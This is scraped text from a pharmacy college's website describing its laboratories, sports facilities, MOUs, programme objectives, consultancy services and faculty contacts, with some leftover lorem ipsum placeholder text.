The Seminar Hall is the ideal venue for seminars and medical professional members to talk and deliver lectures to the students of our college to provide them with a better and closer insight into the working of their different fields. These conferences and lectures not only provide the students with first-hand information about the working of various fields but also give them an opportunity to get their doubts cleared by asking questions from our guests. The guests initially deliver their lecture telling the students about their work, the challenges they face, the difficulties they overcome and so on, and after that the students are given an opportunity to ask questions and clear their doubts if any.

Play Grounds

The College provides all kinds of sports activities and encourages students to take part in games and to ensure their all-round development. All facilities and playgrounds are available for Basket Ball, VolleyBall, Foot Ball, Table Tennis, Cricket, Badminton etc.

Pharmaceutics Laboratories

Pharmaceutics department has two research laboratories for PG Pharmaceutics and separate sophisticated centralized instrumentation laboratory. The major instruments available in the department are Dissolution test apparatus, FTIR, HPLC, UV Double beam spectrophotometer, Ultradigital Sonicator, Rheometer, Brookfield’s Viscometer, KBR Press, Humidity Chamber, High speed homogenizer, Mechanical stirrer, Probe sonicator, Bulk density apparatus, Tablet punching machine, Disintegration tester, Stability chamber.

The department also has well organized Machine Room that can provide hands-on experience on pilot scale pharmaceutical process equipment. Machine room is designed to acquire skills in learning the manufacture of various solid, liquid and semi solid formulations. The Machine room is equipped with rotary tablet press, tray drier, tablet polishing pan, single punch machine, friability  apparatus, ampoule filling and sealing machine, ampoule washing machine, collapsible tube sealing machine, capsule filling machine, hand grinding mill, bottle washing machine, ointment filling machine etc.

Pharmacology Laboratories

Pharmacology department has two separate laboratories for UG and PG. The department has animal house as per the guidelines of CPCSA. The equipment available in the department includes physiograph, plethismometer, analgesiometer, electroconvulsometer, histamine chamber, actophotometer ,clinical biochemical analyser, catalepsy bar apparatus, digital actophotometer, rota-rod apparatus, mazes (elevated plus maze, Y maze, radial arm maze), digital analgesiometer etc

Lorem ipsum dolor sit amet, consectetur adipisicing elit. Optio, neque qui velit. Magni dolorum quidem ipsam eligendi, totam, facilis laudantium cum accusamus ullam voluptatibus commodi numquam, error, est. Ea, consequatur.
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Optio, neque qui velit. Magni dolorum quidem ipsam eligendi, totam, facilis laudantium cum accusamus ullam voluptatibus commodi numquam, error, est. Ea, consequatur.

16 Students of M. Pharm. Pharmacology Attended International Conference

10th International Conference of Laboratory Animal Scientists’ Association (LASA), India

on “Animal Models for One Health Programme: Challenges and Future Perspectives” was held on 3rd & 4th June 2022 at Auditorium, ICAR-National Academy of Agricultural Research Management(NAARM), Rajendranagar Mandal, Hyderabad, Telangana, India. This conference was jointly organized By National Institute of Animal Biotechnology (NIAB), Hyderabad, ICMR - National Animal Resource Facility for Biomedical Research (NARFBR), Hyderabad. Our 16 students of M. Pharm. Pharmacology attended this conference. During conference, renowned speakers delivered talks on various topics. Various companies and institutions have presented their products, services, innovations and research results.  Students expressed gratitude towards Respected Principal and Honorable Management for giving permission to attend conference. 

Memorandum of Understanding (MOUs) with different organizations

  1. Civil Hospital, Satara: To provide training and internship to the students of B. Pharmacy

and M. Pharmacy to collaborate for clinical research and CSR activities. To exchange experts to deliver guest lectures or conduct workshops.

  • Medispray Laboratories, Satara, Maharashtra: To provide training and internship to the students of B. Pharmacy and M. Pharmacy in industrial set-up.
  • Delnova Healthcare, Thane , Maharashtra: An agreement to promote research and development as well as conversion of laboratory research into improved health care products.
  • Insta Vision, Satara , Maharashtra : To provide training and internship to the students of B. Pharmacy and M. Pharmacy students and exchange experts to deliver guest lectures.
  • Collaboration with Onco-Life Cancer Hospital Centre, Satara, for providing hospital facilities and drug information centre and patient counseling to the students of Pharmacy Course.
  • Collaboration with The Ayurvedeeya Arkshala Ltd, Satara, Maharashtra to provide research facilities to the students of B. Pharmacy and M. Pharmacy

Programme Education Objectives

PEO 1

Use modern tools and techniques to model and demonstrate pharmaceutical concepts for industrial applications and healthcare.

PEO 2

Enhance ability to identify and analyze problems and reach a conclusion using rational scientific methods wherever necessary.

PEO 3

Imbibe ability to work independently and in a team in multi Disciplinary settings of Pharmaceutical industry, hospitals, academia and research.

PEO 4

Inculcate ethical practices, environmental concerns, ability to communicate effectively and be independent life-long learners in quest for satisfaction.

PEO 5

Empower and sensitize the Pharmacy professionals to achieve excellence in field of Pharmaceutical Research and development and to provide the highly skilled Professionals in the service of Nation.

Research and Consultancy

Faculty member of the institution in their respective field provided consultancy to the research students, local pharmaceutical & cosmetic manufacturers. 

Institutes provides service for

1. Facilities for preclinical and pharmacological studies

2. UV Analysis for drugs & chemicals (Assay).

3. HPLC Analysis for drugs & chemicals (Assay).

4. FTIR Analysis for drugs & chemicals.

5. Microbiological test.

6. Rheological Behavior

Lorem ipsum dolor sit amet, consectetur adipisicing elit. Optio, neque qui velit. Magni dolorum quidem ipsam eligendi, totam, facilis laudantium cum accusamus ullam voluptatibus commodi numquam, error, est. Ea, consequatur.
Lorem ipsum dolor sit amet, consectetur adipisicing elit. Optio, neque qui velit. Magni dolorum quidem ipsam eligendi, totam, facilis laudantium cum accusamus ullam voluptatibus commodi numquam, error, est. Ea, consequatur.

Contact Us

  • Dr. Prakash Dilip Jadhav

M. Pharmacy (Pharmaceutics)

Mob no. +91-9011087378

Email-pdj_mpharm@yes.edu.in

  • Dr. Vitthal Chaware

M. Pharmacy (Pharmacology)

Mob no. +91-9881390406

Email-mpharmhod_ytc@yes.edu.in

Lorem ipsum dolor sit amet, consectetur adipisicing elit. Optio, neque qui velit. Magni dolorum quidem ipsam eligendi, totam, facilis laudantium cum accusamus ullam voluptatibus commodi numquam, error, est. Ea, consequatur.